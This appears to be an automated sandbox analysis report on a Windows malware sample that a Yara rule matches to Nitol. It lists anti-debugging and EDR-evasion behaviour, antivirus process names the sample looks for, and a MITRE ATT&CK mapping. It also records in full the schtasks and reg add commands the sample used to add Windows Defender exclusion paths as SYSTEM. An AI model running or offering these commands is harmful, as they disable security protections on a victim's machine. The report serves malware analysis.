Source: C:\Users\user\Documents\lOXFJk.exe TID: 1244	Thread sleep time: -60000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\vhZp0W\vhZp0W.exe TID: 3756	Thread sleep time: -35000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\vhZp0W\vhZp0W.exe TID: 5076	Thread sleep time: -45000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\vhZp0W\vhZp0W.exe TID: 3896	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\vhZp0W\vhZp0W.exe TID: 5376	Thread sleep count: 90 > 30	Jump to behavior
Source: C:\Program Files (x86)\vhZp0W\vhZp0W.exe TID: 5376	Thread sleep time: -45000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\vhZp0W\vhZp0W.exe TID: 692	Thread sleep count: 37 > 30	Jump to behavior
Source: C:\Program Files (x86)\vhZp0W\vhZp0W.exe TID: 3284	Thread sleep count: 68 > 30	Jump to behavior
Source: C:\Program Files (x86)\vhZp0W\vhZp0W.exe TID: 3284	Thread sleep time: -34000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\vhZp0W\vhZp0W.exe TID: 3896	Thread sleep time: -30000s >= -30000s	Jump to behavior

Source: C:\Users\user\Documents\lOXFJk.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Program Files (x86)\vhZp0W\vhZp0W.exe	Last function: Thread delayed
Source: C:\Program Files (x86)\vhZp0W\vhZp0W.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Documents\lOXFJk.exe

Code function: 4_2_00007FFE1A51A1B8 FindFirstFileExW,

4_2_00007FFE1A51A1B8

Source: C:\Users\user\Documents\lOXFJk.exe	Thread delayed: delay time: 60000	Jump to behavior
Source: C:\Users\user\Documents\lOXFJk.exe	Thread delayed: delay time: 60000	Jump to behavior
Source: C:\Program Files (x86)\vhZp0W\vhZp0W.exe	Thread delayed: delay time: 30000	Jump to behavior
Source: C:\Program Files (x86)\vhZp0W\vhZp0W.exe	Thread delayed: delay time: 30000	Jump to behavior

Source: C:\Users\user\Documents\lOXFJk.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Users\user\Documents\lOXFJk.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Users\user\Documents\lOXFJk.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer	Jump to behavior
Source: C:\Users\user\Documents\lOXFJk.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior
Source: C:\Users\user\Documents\lOXFJk.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini	Jump to behavior
Source: C:\Users\user\Documents\lOXFJk.exe	File opened: C:\Users\user\AppData	Jump to behavior

Source: 287438657364-7643738421.08.exe, 00000000.00000003.2110077086.00000000005B8000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2129040610.00000000005B8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: vhZp0W.exe, 00000027.00000002.3526255282.00000000013B9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\Documents\lOXFJk.exe	API call chain: ExitProcess graph end node			graph_4-14018
Source: C:\Users\user\Documents\lOXFJk.exe	API call chain: ExitProcess graph end node			graph_4-14362

Source: C:\Users\user\Desktop\287438657364-7643738421.08.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Documents\lOXFJk.exe

Code function: 4_2_00000001400073E0 LdrLoadDll,

4_2_00000001400073E0

Source: C:\Users\user\Documents\lOXFJk.exe

Code function: 4_2_0000000140007C91 RtlCaptureContext,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

4_2_0000000140007C91

Source: C:\Users\user\Documents\lOXFJk.exe

Code function: 4_2_000000014000F000 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

4_2_000000014000F000

Source: C:\Program Files (x86)\vhZp0W\vhZp0W.exe	Code function: 39_3_01700643 mov eax, dword ptr fs:[00000030h]	39_3_01700643
Source: C:\Program Files (x86)\vhZp0W\vhZp0W.exe	Code function: 39_3_017000CD mov eax, dword ptr fs:[00000030h]	39_3_017000CD
Source: C:\Program Files (x86)\vhZp0W\vhZp0W.exe	Code function: 39_3_04D000CD mov eax, dword ptr fs:[00000030h]	39_3_04D000CD
Source: C:\Program Files (x86)\vhZp0W\vhZp0W.exe	Code function: 39_3_04D00643 mov eax, dword ptr fs:[00000030h]	39_3_04D00643

Source: C:\Users\user\Documents\lOXFJk.exe

Code function: 4_2_0000000140004630 GetProcessHeap,HeapReAlloc,GetProcessHeap,HeapAlloc,

4_2_0000000140004630

Source: C:\Users\user\Documents\lOXFJk.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\Documents\lOXFJk.exe	Code function: 4_2_0000000140007C91 RtlCaptureContext,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	4_2_0000000140007C91
Source: C:\Users\user\Documents\lOXFJk.exe	Code function: 4_2_00000001400106B0 RtlCaptureContext,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	4_2_00000001400106B0
Source: C:\Users\user\Documents\lOXFJk.exe	Code function: 4_2_00000001400092E0 SetUnhandledExceptionFilter,	4_2_00000001400092E0
Source: C:\Users\user\Documents\lOXFJk.exe	Code function: 4_2_00007FFE1A5176E0 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	4_2_00007FFE1A5176E0
Source: C:\Users\user\Documents\lOXFJk.exe	Code function: 4_2_00007FFE1A511F50 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	4_2_00007FFE1A511F50
Source: C:\Users\user\Documents\lOXFJk.exe	Code function: 4_2_00007FFE1A512630 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	4_2_00007FFE1A512630
Source: C:\Program Files (x86)\b3aEb0H\1y6U0V.exe	Code function: 43_2_009510CC IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	43_2_009510CC
Source: C:\Program Files (x86)\b3aEb0H\1y6U0V.exe	Code function: 43_2_00952AE2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	43_2_00952AE2
Source: C:\Program Files (x86)\b3aEb0H\1y6U0V.exe	Code function: 43_2_009551FB __NMSG_WRITE,_raise,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	43_2_009551FB

HIPS / PFW / Operating System Protection Evasion

Found direct / indirect Syscall (likely to bypass EDR)

Source: C:\Users\user\Documents\lOXFJk.exe	NtAllocateVirtualMemory: Indirect: 0x140006FD0	Jump to behavior
Source: C:\Users\user\Documents\lOXFJk.exe	NtProtectVirtualMemory: Indirect: 0x2A1B253	Jump to behavior
Source: C:\Users\user\Desktop\287438657364-7643738421.08.exe	NtDelayExecution: Indirect: 0x1D94D5	Jump to behavior
Source: C:\Users\user\Documents\lOXFJk.exe	NtProtectVirtualMemory: Indirect: 0x29BB253	Jump to behavior

Source: C:\Users\user\Documents\lOXFJk.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F	Jump to behavior
Source: C:\Users\user\Documents\lOXFJk.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F	Jump to behavior
Source: C:\Users\user\Documents\lOXFJk.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F	Jump to behavior
Source: C:\Users\user\Documents\lOXFJk.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"%USERPROFILE%\Documents\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F	Jump to behavior
Source: C:\Users\user\Documents\lOXFJk.exe	Process created: C:\Program Files (x86)\vhZp0W\vhZp0W.exe "C:\Program Files (x86)\vhZp0W\vhZp0W.exe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Run /TN "Task1"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Delete /TN "Task1" /F	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Run /TN "Task1"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Delete /TN "Task1" /F	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users" /t REG_DWORD /d 0 /f	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Run /TN "Task1"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Delete /TN "Task1" /F	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Program Files (x86)" /t REG_DWORD /d 0 /f	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\user\Documents\" /t REG_DWORD /d 0 /f"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Run /TN "Task1"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Delete /TN "Task1" /F	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\user\Documents" /t REG_DWORD /d 0 /f	Jump to behavior

Source: C:\Users\user\Documents\lOXFJk.exe	Process created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" cmd.exe /c schtasks /create /f /tn "task1" /sc once /st 00:00 /rl highest /ru "system" /tr "cmd.exe /c reg add \"hklm\software\microsoft\windows defender\exclusions\paths\" /v \"c:\programdata\" /t reg_dword /d 0 /f" & schtasks /run /tn "task1" & schtasks /delete /tn "task1" /f
Source: C:\Users\user\Documents\lOXFJk.exe	Process created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" cmd.exe /c schtasks /create /f /tn "task1" /sc once /st 00:00 /rl highest /ru "system" /tr "cmd.exe /c reg add \"hklm\software\microsoft\windows defender\exclusions\paths\" /v \"c:\users\" /t reg_dword /d 0 /f" & schtasks /run /tn "task1" & schtasks /delete /tn "task1" /f
Source: C:\Users\user\Documents\lOXFJk.exe	Process created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" cmd.exe /c schtasks /create /f /tn "task1" /sc once /st 00:00 /rl highest /ru "system" /tr "cmd.exe /c reg add \"hklm\software\microsoft\windows defender\exclusions\paths\" /v \"c:\program files (x86)\" /t reg_dword /d 0 /f" & schtasks /run /tn "task1" & schtasks /delete /tn "task1" /f
Source: C:\Users\user\Documents\lOXFJk.exe	Process created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" cmd.exe /c schtasks /create /f /tn "task1" /sc once /st 00:00 /rl highest /ru "system" /tr "cmd.exe /c reg add \"hklm\software\microsoft\windows defender\exclusions\paths\" /v \"%userprofile%\documents\" /t reg_dword /d 0 /f" & schtasks /run /tn "task1" & schtasks /delete /tn "task1" /f
Source: C:\Users\user\Documents\lOXFJk.exe	Process created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" cmd.exe /c schtasks /create /f /tn "task1" /sc once /st 00:00 /rl highest /ru "system" /tr "cmd.exe /c reg add \"hklm\software\microsoft\windows defender\exclusions\paths\" /v \"c:\programdata\" /t reg_dword /d 0 /f" & schtasks /run /tn "task1" & schtasks /delete /tn "task1" /f	Jump to behavior
Source: C:\Users\user\Documents\lOXFJk.exe	Process created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" cmd.exe /c schtasks /create /f /tn "task1" /sc once /st 00:00 /rl highest /ru "system" /tr "cmd.exe /c reg add \"hklm\software\microsoft\windows defender\exclusions\paths\" /v \"c:\users\" /t reg_dword /d 0 /f" & schtasks /run /tn "task1" & schtasks /delete /tn "task1" /f	Jump to behavior
Source: C:\Users\user\Documents\lOXFJk.exe	Process created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" cmd.exe /c schtasks /create /f /tn "task1" /sc once /st 00:00 /rl highest /ru "system" /tr "cmd.exe /c reg add \"hklm\software\microsoft\windows defender\exclusions\paths\" /v \"c:\program files (x86)\" /t reg_dword /d 0 /f" & schtasks /run /tn "task1" & schtasks /delete /tn "task1" /f	Jump to behavior
Source: C:\Users\user\Documents\lOXFJk.exe	Process created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" cmd.exe /c schtasks /create /f /tn "task1" /sc once /st 00:00 /rl highest /ru "system" /tr "cmd.exe /c reg add \"hklm\software\microsoft\windows defender\exclusions\paths\" /v \"%userprofile%\documents\" /t reg_dword /d 0 /f" & schtasks /run /tn "task1" & schtasks /delete /tn "task1" /f	Jump to behavior

Source: C:\Users\user\Documents\lOXFJk.exe

Code function: 4_2_00007FFE1A51FD40 cpuid

4_2_00007FFE1A51FD40

Source: C:\Users\user\Documents\lOXFJk.exe	Code function: GetLocaleInfoA,		4_2_000000014000F370
Source: C:\Program Files (x86)\b3aEb0H\1y6U0V.exe	Code function: GetLocaleInfoA,		43_2_00956B1A

Source: C:\Users\user\Documents\lOXFJk.exe

Code function: 4_2_000000014000A370 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,

4_2_000000014000A370

Source: C:\Users\user\Documents\lOXFJk.exe

Code function: 4_2_0000000140005A70 GetStartupInfoW,GetProcessHeap,HeapAlloc,GetVersionExA,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,

4_2_0000000140005A70

Source: lOXFJk.exe, 00000004.00000002.2269642087.0000000002788000.00000002.00001000.00020000.00000000.sdmp, vhZp0W.exe, 00000027.00000002.3528421015.00000000054E0000.00000004.00000020.00020000.00000000.sdmp, vhZp0W.exe, 00000027.00000002.3528906375.000000001002D000.00000004.00001000.00020000.00000000.sdmp, vhZp0W.exe, 00000027.00000002.3527148371.0000000003A6D000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: kxetray.exe
Source: lOXFJk.exe, 00000004.00000002.2269642087.0000000002788000.00000002.00001000.00020000.00000000.sdmp, vhZp0W.exe, 00000027.00000002.3527148371.0000000003A6D000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: vsserv.exe
Source: lOXFJk.exe, 00000004.00000002.2269642087.0000000002788000.00000002.00001000.00020000.00000000.sdmp, vhZp0W.exe, 00000027.00000002.3528421015.00000000054E0000.00000004.00000020.00020000.00000000.sdmp, vhZp0W.exe, 00000027.00000002.3528906375.000000001002D000.00000004.00001000.00020000.00000000.sdmp, vhZp0W.exe, 00000027.00000002.3527148371.0000000003A6D000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: avcenter.exe
Source: lOXFJk.exe, 00000004.00000002.2269642087.0000000002788000.00000002.00001000.00020000.00000000.sdmp, vhZp0W.exe, 00000027.00000002.3527148371.0000000003A6D000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: KSafeTray.exe
Source: lOXFJk.exe, 00000004.00000002.2269642087.0000000002788000.00000002.00001000.00020000.00000000.sdmp, vhZp0W.exe, 00000027.00000002.3528421015.00000000054E0000.00000004.00000020.00020000.00000000.sdmp, vhZp0W.exe, 00000027.00000002.3528906375.000000001002D000.00000004.00001000.00020000.00000000.sdmp, vhZp0W.exe, 00000027.00000002.3527148371.0000000003A6D000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: avp.exe
Source: vhZp0W.exe, vhZp0W.exe, 00000027.00000002.3527148371.0000000003A6D000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: 360safe.exe
Source: vhZp0W.exe, 00000027.00000002.3527148371.0000000003A6D000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: SuperKiller.exe
Source: vhZp0W.exe, 00000027.00000002.3528421015.00000000054E0000.00000004.00000020.00020000.00000000.sdmp, vhZp0W.exe, 00000027.00000002.3528906375.000000001002D000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: msmpeng.exe
Source: vhZp0W.exe, 00000027.00000002.3527148371.0000000003A6D000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: Autoruns.exe
Source: lOXFJk.exe, 00000004.00000002.2269642087.0000000002788000.00000002.00001000.00020000.00000000.sdmp, vhZp0W.exe, 00000027.00000002.3527148371.0000000003A6D000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: 360Safe.exe
Source: vhZp0W.exe, 00000027.00000002.3527148371.0000000003A6D000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: mcshield.exe
Source: lOXFJk.exe, 00000004.00000002.2269642087.0000000002788000.00000002.00001000.00020000.00000000.sdmp, vhZp0W.exe, vhZp0W.exe, 00000027.00000002.3528421015.00000000054E0000.00000004.00000020.00020000.00000000.sdmp, vhZp0W.exe, 00000027.00000002.3528906375.000000001002D000.00000004.00001000.00020000.00000000.sdmp, vhZp0W.exe, 00000027.00000002.3527148371.0000000003A6D000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: 360tray.exe
Source: lOXFJk.exe, 00000004.00000002.2269642087.0000000002788000.00000002.00001000.00020000.00000000.sdmp, vhZp0W.exe, 00000027.00000002.3528421015.00000000054E0000.00000004.00000020.00020000.00000000.sdmp, vhZp0W.exe, 00000027.00000002.3528906375.000000001002D000.00000004.00001000.00020000.00000000.sdmp, vhZp0W.exe, 00000027.00000002.3527148371.0000000003A6D000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: rtvscan.exe
Source: lOXFJk.exe, 00000004.00000002.2269642087.0000000002788000.00000002.00001000.00020000.00000000.sdmp, vhZp0W.exe, 00000027.00000002.3528421015.00000000054E0000.00000004.00000020.00020000.00000000.sdmp, vhZp0W.exe, 00000027.00000002.3528906375.000000001002D000.00000004.00001000.00020000.00000000.sdmp, vhZp0W.exe, 00000027.00000002.3527148371.0000000003A6D000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: ashDisp.exe
Source: lOXFJk.exe, 00000004.00000002.2269642087.0000000002788000.00000002.00001000.00020000.00000000.sdmp, vhZp0W.exe, 00000027.00000002.3528421015.00000000054E0000.00000004.00000020.00020000.00000000.sdmp, vhZp0W.exe, 00000027.00000002.3528906375.000000001002D000.00000004.00001000.00020000.00000000.sdmp, vhZp0W.exe, 00000027.00000002.3527148371.0000000003A6D000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: TMBMSRV.exe
Source: vhZp0W.exe, vhZp0W.exe, 00000027.00000002.3528421015.00000000054E0000.00000004.00000020.00020000.00000000.sdmp, vhZp0W.exe, 00000027.00000002.3528906375.000000001002D000.00000004.00001000.00020000.00000000.sdmp, vhZp0W.exe, 00000027.00000002.3527148371.0000000003A6D000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: 360Tray.exe
Source: lOXFJk.exe, 00000004.00000002.2269642087.0000000002788000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: avgwdsvc.exe
Source: lOXFJk.exe, 00000004.00000002.2269642087.0000000002788000.00000002.00001000.00020000.00000000.sdmp, vhZp0W.exe, 00000027.00000002.3528421015.00000000054E0000.00000004.00000020.00020000.00000000.sdmp, vhZp0W.exe, 00000027.00000002.3528906375.000000001002D000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: AYAgent.aye
Source: lOXFJk.exe, 00000004.00000002.2269642087.0000000002788000.00000002.00001000.00020000.00000000.sdmp, vhZp0W.exe, 00000027.00000002.3528421015.00000000054E0000.00000004.00000020.00020000.00000000.sdmp, vhZp0W.exe, 00000027.00000002.3528906375.000000001002D000.00000004.00001000.00020000.00000000.sdmp, vhZp0W.exe, 00000027.00000002.3527148371.0000000003A6D000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: QUHLPSVC.EXE
Source: lOXFJk.exe, 00000004.00000002.2269642087.0000000002788000.00000002.00001000.00020000.00000000.sdmp, vhZp0W.exe, 00000027.00000002.3528421015.00000000054E0000.00000004.00000020.00020000.00000000.sdmp, vhZp0W.exe, 00000027.00000002.3528906375.000000001002D000.00000004.00001000.00020000.00000000.sdmp, vhZp0W.exe, 00000027.00000002.3527148371.0000000003A6D000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: RavMonD.exe
Source: lOXFJk.exe, 00000004.00000002.2269642087.0000000002788000.00000002.00001000.00020000.00000000.sdmp, vhZp0W.exe, 00000027.00000002.3528421015.00000000054E0000.00000004.00000020.00020000.00000000.sdmp, vhZp0W.exe, 00000027.00000002.3528906375.000000001002D000.00000004.00001000.00020000.00000000.sdmp, vhZp0W.exe, 00000027.00000002.3527148371.0000000003A6D000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: MsMpEng.exe
Source: vhZp0W.exe, 00000027.00000002.3528421015.00000000054E0000.00000004.00000020.00020000.00000000.sdmp, vhZp0W.exe, 00000027.00000002.3528906375.000000001002D000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: Mcshield.exe
Source: lOXFJk.exe, 00000004.00000002.2269642087.0000000002788000.00000002.00001000.00020000.00000000.sdmp, vhZp0W.exe, 00000027.00000002.3528421015.00000000054E0000.00000004.00000020.00020000.00000000.sdmp, vhZp0W.exe, 00000027.00000002.3528906375.000000001002D000.00000004.00001000.00020000.00000000.sdmp, vhZp0W.exe, 00000027.00000002.3527148371.0000000003A6D000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: K7TSecurity.exe

Stealing of Sensitive Information

Yara detected Nitol

Source: Yara match	File source: 39.2.vhZp0W.exe.54e03e8.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 39.2.vhZp0W.exe.54e03e8.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 39.2.vhZp0W.exe.10000000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000027.00000002.3528421015.00000000054E0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000027.00000002.3528906375.000000001002D000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: vhZp0W.exe PID: 4336, type: MEMORYSTR

Remote Access Functionality

Yara detected Nitol

Source: Yara match	File source: 39.2.vhZp0W.exe.54e03e8.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 39.2.vhZp0W.exe.54e03e8.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 39.2.vhZp0W.exe.10000000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000027.00000002.3528421015.00000000054E0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000027.00000002.3528906375.000000001002D000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: vhZp0W.exe PID: 4336, type: MEMORYSTR

Source: C:\Users\user\Documents\lOXFJk.exe	Code function: 4_2_00000001400042B0 EnterCriticalSection,CancelWaitableTimer,SetEvent,WaitForSingleObject,TerminateThread,CloseHandle,CloseHandle,CloseHandle,RpcServerUnregisterIf,RpcMgmtStopServerListening,EnterCriticalSection,LeaveCriticalSection,DeleteCriticalSection,#4,#4,#4,LeaveCriticalSection,DeleteCriticalSection,#4,		4_2_00000001400042B0
Source: C:\Users\user\Documents\lOXFJk.exe	Code function: 4_2_0000000140003F80 InitializeCriticalSection,#4,#4,GetCurrentProcess,OpenProcessToken,GetLastError,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,EnterCriticalSection,LeaveCriticalSection,GetVersionExW,RpcSsDontSerializeContext,RpcServerUseProtseqEpW,RpcServerRegisterIfEx,RpcServerListen,CreateWaitableTimerW,CreateEventW,SetWaitableTimer,		4_2_0000000140003F80

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	2 Native API	1 DLL Side-Loading	1 Abuse Elevation Control Mechanism	1 Disable or Modify Tools	1 Credential API Hooking	1 System Time Discovery	Remote Services	1 Archive Collected Data	1 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	113 Command and Scripting Interpreter	33 Windows Service	1 DLL Side-Loading	1 Abuse Elevation Control Mechanism	LSASS Memory	4 File and Directory Discovery	Remote Desktop Protocol	1 Credential API Hooking	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	11 Scheduled Task/Job	11 Scheduled Task/Job	1 Access Token Manipulation	2 Obfuscated Files or Information	Security Account Manager	223 System Information Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	1 Non-Standard Port	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	12 Service Execution	1 Registry Run Keys / Startup Folder	33 Windows Service	1 Software Packing	NTDS	331 Security Software Discovery	Distributed Component Object Model	Input Capture	2 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	11 Process Injection	1 DLL Side-Loading	LSA Secrets	1 Process Discovery	SSH	Keylogging	3 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
